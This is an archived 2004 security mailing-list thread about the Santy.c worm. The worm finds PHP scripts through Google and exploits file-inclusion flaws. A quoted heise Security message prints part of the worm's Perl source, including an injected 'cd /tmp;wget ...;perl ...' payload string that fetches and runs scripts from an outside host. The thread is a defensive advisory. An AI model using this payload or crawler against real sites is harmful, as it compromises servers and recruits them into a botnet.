Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )

from [K-OTiK Security] Network Security [Permanent Link]
Subject: Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )
Date: 26 Dec 2004 02:37:52 -0000 
In-Reply-To: <Pine.LNX.4.58.0412251805110.19888@loki.ct.heise.de>

The kids are exploiting the php file inclusion (programming flaw), 
well-thought-out.

Thousands of vulnerable sites and potentially thousands of zombies...

We labelled this Santy.c (even if the only similarity with Santy lies in "using 
search engines").

http://www.k-otik.com/exploits/20041225.SantyC.php
http://www.k-otik.com/exploits/20041225.SantyB.php

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com 



From: Juergen Schmidt <ju@heisec.de>

Hello,

the new santy version not only attacks phpBB.

It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...

Often enough this leads to download and execution of code.
On success the worm connects to an IRC server, where already more than 700
zombies are waiting for commands.

The relevant code:
---------
$procura = 'inurl:*.php?*=' . $numr;

for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort =>
80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
...

$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget
www.visualcod
ers.net/php.txt;wget www.visualcoders.net/ownz.txt;wget
www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl
ownz.txt;perl php.txt';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
  {
   if ($ja[$t] =~/=/)
     {
      $num = rindex $ja[$t], '=';
      $num += 1;
      $ja[$t] = substr($ja[$t],0,$num);
           open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
caxe1.txt";
           print jaera "$ja[$t]$lista1\n";
           close(jaera);
       $num = index $ja[$t], '=';
       $num += 1;
       $ja[$t] = substr($ja[$t],0,$num);
       $num1 = rindex $ja[$t], '.';
       $subproc = substr($ja[$t],$num1,$num);

           open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
caxe1.txt";
           print jaera "$ja[$t]$lista1\n";
           close(jaera);
     }
    $t++;
    }


bye, ju

-- 
Juergen Schmidt       Chefredakteur  heise Security     www.heisec.de
Heise Zeitschriften Verlag,    Helstorferstr. 7,       D-30625 Hannover
Tel. +49 511 5352 300      FAX +49 511 5352 417       EMail ju@heisec.de
GPG-Key: 0x38EA4970,  5D7B 476D 84D5 94FF E7C5  67BE F895 0A18 38EA 4970
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? ), K-OTiK Security <=
Previous by Date:  New Santy-Worm attacks *all* PHP-skripts, Juergen Schmidt
Next by Date:  Re: Microsoft Windows LoadImage API Integer Buffer overflow, Brett Glass
Previous by Thread:  New Santy-Worm attacks *all* PHP-skripts, Juergen Schmidt
Next by Thread:  New Winhlp32.exe vuln, bad_son
Indexes:  [Date] [Thread] [Top] [All Lists]